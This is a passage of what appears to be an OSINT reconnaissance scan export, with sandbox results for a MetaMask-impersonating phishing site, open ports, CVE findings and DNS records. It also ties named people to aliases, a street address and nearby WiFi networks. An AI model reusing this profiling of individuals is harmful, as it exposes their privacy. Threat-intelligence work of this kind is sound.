"ASCII text with very long lines"- [targetUID: N/A]\n "nr-spa-1212.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "2.6b2b9e73.chunk_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "IDF_Cigna_1_.png" has type "PNG image data 801 x 98 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "trustev.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Register_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "la-regular-400_1_.eot" has type "Embedded OpenType (EOT) la-regular-400 family"- [targetUID: N/A]\n "open-sans-v17-latin-800.8ab0bbdd_1_.woff" has type "Web Open Font Format TrueType length 19072 version 1.1"- [targetUID: N/A]\n "open-sans-v17-latin-700.f24f4bce_1_.woff" has type "Web Open Font Format TrueType length 18900 version 1.1"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"cigna.identityforce_1_.xml" has type "Unknown"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://u8718684.ct.sendgrid.net/ls/click?upn=c5xukOe5Km-2FX79RKM6mUHkScXT7d3MNfbWP0FHOMHMSulHtt7TNqqdRBsqy10BrNUPGt1JnDtK6UMujmNu-2Bt5QYPlc-2BQr | 185.199.110.153 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.191): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | avanticom (Net ID: 00:02:6F:09:A3:B6) | 50.1188, 8.6843 |
| 2023-05-12 02:53:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://www.metawalletss.com/download.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d58_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3416"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d58_ConnHashTable<3416>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_d58_IESQMMUTEX_0_519"\n "IsoScope_d58_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d58_IE_EarlyTabStart_0xa74_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3416"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.211:80"\n "154.82.100.211:443"\n "142.250.189.202:443"\n "142.250.189.234:443"\n "142.250.191.35:443"\n "43.251.41.15:443"\n "185.199.109.153:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.metawalletss.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "metamask.io"\n "va.v.liveperson.net"\n "www.metawalletss.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta content="MetaMask Download" property="twitter:title">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<meta content="summary_large_image" name="twitter:card">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<a href="javascript:;" rel="noreferer\n noopener" target="_blank" class="footer-link">Twitter</a>" (Indicator: "dir "; File: "download_2_.htm")\n file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:after {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"download-android_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlaced" and extension "png"\n "download-extension_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlaced" and extension "png"\n "download-ios_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlaced" and extension "png"\n "Edge_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced" and extension "png"\n "Brave_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced" and extension "png"\n "Firefox_1Firefox_1_.png" has type "PNG image data 107 x 100 8-bit/color RGBA non-interlaced" and extension "png"\n "chrome_1chrome_1_.png" has type "PNG image data 100 x 100 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eedc9fcb-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{eedc9fcd-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd28e17afbccfac18.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{eedc9fcd-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd28e17afbccfac18.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df659f277b3559949f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eedc9fcb-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "webflow_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n ".jsonp_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "metamask-staging-2.webflow_1_.css" has type "ASCII text"- [targetUID: N/A]\n "download-android_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlace | 185.199.109.153 |
| 2023-05-12 02:56:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.135.9 | www.ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | JBZD (Category: images)
https://jbzd.com.pl/uzytkownik/login | login |
| 2023-05-12 03:01:48 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 0 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | www.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | nginx | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:14 GMT", "content-type": "text/html"} |
| 2023-05-12 03:13:42 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 0 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 87.248.157.102 |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:8080 | 188.114.96.0/24 |
| 2023-05-12 02:44:03 | Human Name | No | SpiderFoot UI | 2 | 0 | 0 | 0 | None | Patrick Pogoda | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | nore (Net ID: 00:01:E3:0B:96:F0) | 50.1188, 8.6843 |
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:8080 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Physical Location | No | URLScan.io | 0 | 0 | 1 | 0 | None | DE | battleb0t.xyz |
| 2023-05-12 03:11:12 | Physical Coordinates | No | OpenStreetMap | 74 | 0 | 4 | 0 | None | 33.617190550339146,-111.90827887019054 | 14455 North Hayden Rd, Scottsdale, US-AZ, US, 85260 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:53:19 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [34.74.170.74]
https://www.virustotal.com/en/ip-address/34.74.170.74/information/ | 34.74.170.74 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:38 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | nuke.battleb0t.xyz |
| 2023-05-12 02:45:29 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'104.196.30.220', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'104.196.0.0/18', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 104.196.30.220 |
| 2023-05-12 03:09:50 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 82.170.74.34.bc.googleusercontent.com | 34.74.170.82 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:24) | 41.8781, -87.6298 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.166): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:24 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Wayport_Access (Net ID: 00:14:6A:5B:53:91) | 32.8608, -79.9746 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01101101.github.io | 185.199.111.153 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.131): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Room 229 (Net ID: 00:02:2D:8B:9E:AE) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:41:56 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | mn2.tjdev.de | 45.131.109.48 |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2083 | 104.21.71.14 |
| 2023-05-12 02:55:25 | Raw Data from RIRs | No | Google | 1 | 0 | 2 | 0 | None | {'webSearchUrl': u'https://www.google.com/search?q=site:www.ayhu.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://www.ayhu.xyz/']} | www.ayhu.xyz |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 4 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c59d97743e3')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IzWcLwqG74V5tV1nWv6NwCgv19x6fOKHH9bpAKGqFvs-1683861861-0-AaT1IDJ8zL-HPKAcS5jW_S_lOAZThpdmCpakWJJZLTdl-YC7YmW7x0R3Esq2ci5pRxETFrXUoScSBrwB5quPRe1171zsRq5FO5HvSBsT8wSH48d6cjZBcafhFd-gYMgKn5vz-FkJUPQ0nF10-q2ubdvcw8hKSSRUsAC4C2bgwDMz0kRykTgIN5O-4hUEH_aIMPUl85RgiecFAuvX8Ivy5H7CWHsXJNLmrFihUW3yur5y4mznmwIt6LoJGKtAduIhk1MMkrSy06zOCVQNVecBCYfPFg-LQUxzu01zND8kx6XIr4D_Z7JCVLT2xHDvC0QW8SVEpEQxyz1_6w4Q_kXekAKzWUv6f2WQc9reLDcoidSiSGME_E1JbznCGlu2Qcv2UxBiUp3ZaVMVnVkjfbD8tvqsMpOiPHRoL0QGNOvZC9IWd3DmNkLVl0o7A7gZ6X6XvmxN8FN6zQ5MuokY1veB1HzJur_7DeYGkiQKi-0P2vRxvm4WDXUmU4f2tq7Esl4HSqC16vv9LBLaBAi8Z_5ASfDKC4_Qtwk5ocpapPABdtQe_KyihhYQ0p3PsebP3qabKmLOkD2fDvF3lYLd3qMvC4RgGh-YX8l7PTUCq3wEfd8Mi9e6YReBeIzcGw5PwaoMHFYsP5RhUMwk71xYoONoQnXtJO45ecOy75oe90Gm07DUOsZsURI3qtJbwRlmpa7xW_oJhMCvGoxCaFBmv4Tj_3i4JWKOMf7hpKtp919xj-jQIAWQmSIDBw3LhMZPRePjKwSZV17PsqlmFxhMjxxo_oGcprk2tlsBrXLDx9NJVWy2DHDR-TPwL1u1-c5lRkjOzwwNIlsSIltqwOI6w4aVA6MdRM9LQlE6JVGhJTOkyMSmOGg0b-gPtNYSVQZ4M0bbvY5ZejvC-622MlBNpTcTQgj-Hr5BRzvJOQNVBtKeZNEcL0V-HlUOqjgsgCuZ0n-_DmccPSp6yXjib7zziw0VsFZ51VNwFMiyAJLSoQVd1OjGuw3fSFPRsqIT0NzkM6LJJ9oyKVkZXep7mdpjCvm52q0byqZXvzL2VDAtJAJmAXjedpHk-ixt-DqOfzQw9GqcICnOaIAwGCalMfoPOf8GPEND9RClu9LRyO_FDNt75C01Varldc5Ftwg8k-rAHBToDSA8_BQdwA01UognhxgoBkv5pTU2f0H6TbryBj0d8lUJpXsYh3CtyN0y8DOT_kz_DjrrzIT964Pdi7AsCCs8mo2IE6lrD73n8Izje7P97pkFkPjlBN2jtfhSvPURw_vpTJ5ZaaFdYA9KK-YFF68xMCw6ewAMK1rkYSoe1oqSv02a9QAvlbxHhD_COD3weHDV-tI_xq_UVBQKGO4fDKE5ZB_Li_qQJ1UU8CLWZeL01WBdYpUyqwj8DSDtW_hWLGQxeKSnHsjkNN44s8ztTjWQa0EOv111zkoc_jo1-AKbBfegf0gXFbeefPUQPApaVp0ZSh976fXDUBkg-u9zIFuO8PmOpT12qOluulzM3HAWuIXPfFdKdkuM_0Ju0J2nYUnPnIIPw7-X0VlO10ISCMaRppc2X6T6WN3Me0ur-AgpXQrtaOHERtZpzl81diItC7rlhoi2hcwlyknYz9uG6Jvt4vO7CVGEkxo64WkJUYfdQcxWDVfCj5P8OtigH5bAFPrPlThHqTc5vpPnWpu_04hxNRR1-yz89uQ30xUpmEOd55phY60kcWBwhTfKO_t_0MJs_4gMTnO_VQemTQRtnrcmjKY2pn8nAizQEc0LX-nJ_4sW5z-DGM44AAFGVM5-U7o0Y7m1jXwg99HdEmqr2iPndrQh3ksnfvVAApgCg0pbwWbA71pkVfyO8vPpUv_GruozMnSwm3sFOR28jhXLHljB6WOMjmilFX-I80iAeT78A5CMWmca6g1quxd5xHVTMFnl-Ys3ieqarC7YmJ7eytJNcbcsYSdnciNL21ndjddEi22yCTG9No7nWap74I3S-XDZ5j0YJh9aMipl2sHc0u1U-Vx2vJmPYYV1MWTS_cbbT2ub5ALyjMgyaSA96qpG_Ooy4cFCkf0E0RRynEWRVadMZE1Vz5bBogaFEOjsc334EAR0zTIX8_4nnRO5mOvEVRo4ZTcKeicbfVjehihRxW1wdSDJAbbGCjjkZj3DldP4NK0vlhWlD9UbhT6NEC6tNcCjkKUECuinurOI-oV4Cegh-51bGD-UpvxqLsfIQd9QODY03eyCxUur045Y22aLoD51JCbhy39Jp0fS35dbrG4QIggvUdxGVolRMemldY1hGoUkHPtE8nB2YB7L2z90pSQRrkz2F1mucH6C2aK0d1BE2f04Z7nAiGFk7bERb053H4pvO-fGR73M06TI9KFQDNVYHk7iyF8yJ8kA23l9FgJhokSfUX3_PYhrtNIdVilfmf2nfkSfGzPgsBbAL-1WUlksPvUQq7Tut8_2gnISEhXjovKigslLYWTdPYupiAliABg3BLe_WNuc41K408YYwipU-2SdiixQBhgUVLS8Sh615rA">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '89417',
cRay: '7c5f8c59d97743e3',
cHash: 'd514be865123f26',
cUPMDTk: "\/lol.html?__cf_chl_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
